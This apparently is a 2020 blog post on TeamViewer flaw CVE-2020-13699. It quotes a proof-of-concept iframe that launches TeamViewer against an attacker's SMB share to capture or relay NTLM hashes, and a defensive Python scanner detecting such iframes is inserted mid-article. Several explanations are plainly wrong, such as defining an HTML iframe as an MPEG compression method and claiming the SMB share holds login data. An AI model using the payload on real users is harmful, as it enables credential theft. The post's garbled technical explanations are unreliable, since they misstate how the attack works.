TeamViewer’s New Exploit Is Riskier Than You Might Think



TeamViewer is a popular remote desktop application. It allows its users to connect to remote computers over the internet and control them or transfer files from them. But a newly discovered exploit in this program allows hackers to gain access to the computers instead, which can lead to bigger problems like malware or ransomware.

This is a URI exploit. The webopedia website defines URI as “Short for Uniform Resource Identifier, the generic term for all types of names and addresses that refer to objects on the World Wide Web”. Essentially, this exploit used one of these URIs to launch the TeamViewer application and establish a connection between TeamViewer and a hacker. The URI would be supplied when the user browses a website that has a malicious iframe in it. An iframe is “Short for intraframe, a video compression method used by the MPEG standard”. Many people use websites that contain videos that might have these malicious iframes in them. We delve into the problem in more detail below.

Discovering The Exploit

Jeffrey Hofmann is a security engineer currently working with Praetorian Cyber Security group. A computer geek to the max, he has provided a .txt file on the matter explaining how he discovered the exploit and how it operates. He discovered the CVE and reported it soon after. He explains that:

“An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

An SMB share is essentially the hacker’s key to success, as it provides the hacker with a Server Message Block that contains the login information within it. This allows the hacker access to the TeamViewer of the account that has opened the unsecured iframe we talked about earlier, with no need for any authentication or password.

This vulnerability was assigned CVE-2020-13699. It is a particularly dangerous attack because it provides hackers with full access to the computers, and the fact that it can be launched remotely is perfect for that Chinese hacking team that wants to infect your computers with all kinds of ransomware.
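A defensive check for the pattern in the advisory quoted above, added here as an example (not from the original article or from TeamViewer): it scans HTML for URL attributes that use a TeamViewer URI scheme and carry an injected command-line switch or a UNC path. The `teamviewer\w*` scheme match, the function and class names, and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Assumption: any scheme beginning with "teamviewer" is a TeamViewer handler;
# the article itself only shows "teamviewer10:".
SCHEME_RE = re.compile(r"^\s*(teamviewer\w*):(.*)$", re.IGNORECASE | re.DOTALL)
OPTION_RE = re.compile(r"(?:^|\s)--?[A-Za-z][\w-]*")  # injected command-line switch
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")         # \\host\share

class HandlerAbuseScanner(HTMLParser):
    URL_ATTRS = {"src", "href", "data", "action"}
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in self.URL_ATTRS or not value:
                continue
            # Decode %20, %5C etc. so encoded payloads are judged the same way.
            match = SCHEME_RE.match(unquote(value))
            if not match:
                continue
            rest = match.group(2)
            reasons = [label for label, rx in
                       (("argument-injection", OPTION_RE), ("unc-path", UNC_RE))
                       if rx.search(rest)]
            if reasons:
                self.findings.append({"line": self.getpos()[0], "tag": tag,
                                      "scheme": match.group(1).lower(),
                                      "reasons": reasons})

def scan_html(html):
    scanner = HandlerAbuseScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page: line 3 is the iframe quoted in the article.
SAMPLE_HTML = r"""<html><body>
<a href="teamviewer10:12345">plain handler link, no arguments</a>
<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
<iframe src="teamviewer10:%20--play%20%5C%5Cfiles.example%5Cshare%5Cx.tvs"></iframe>
<iframe src="https://video.example/embed/1"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(*scan_html(SAMPLE_HTML), sep="\n")
```

The same two signals (a switch after the scheme, a UNC path in the value) can be applied to proxy logs or saved page content; a plain handler link without arguments is not flagged.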

 

Can You Speak English? I Don’t Understand The Jargon

Well, essentially this attack is fairly easy to explain in human language. First of all, you won’t even notice it happening, because you are busy browsing the web and TeamViewer can always run in the background without you noticing. The hacker has to know about the URI, which gives programs permission to do things on your behalf to the computer via the browser. Mostly these URIs are harmless and nothing would change in terms of security, but when hackers have access to a URI they can write another command instead of what the program normally does. That means they can use these custom URIs to launch a TeamViewer connection to your system without you noticing. Essentially, you are browsing the web, you click the wrong link, and that’s it: congratulations, now it’s hunting season and the hackers will try their best to exploit your system and you.


The Aftermath of the TeamViewer Security Exploit

After the security exploit was reported thanks to our geeky cyber security expert, the TeamViewer team got hold of the matter, and their community manager has explained that there will be an update for TeamViewer versions 8 through 15 to fix the exploit. They released the update three weeks ago and now TeamViewer is as safe as ever. But if you are still worried about your computer security and don’t want hackers to intrude, read on.

With the advancements made in both hacking and computer security in the past decade, specialized devices have come into being that can ensure cyber security in a more sophisticated and tailored manner. This is due to the different specializations that have sprung up in the last few years. Remote connection security is one of them, and it’s not taken as seriously as it should be. We advise you to read this article to get more information on how you can protect your remote desktop connections better.

Published by Blogger at 2020 August 22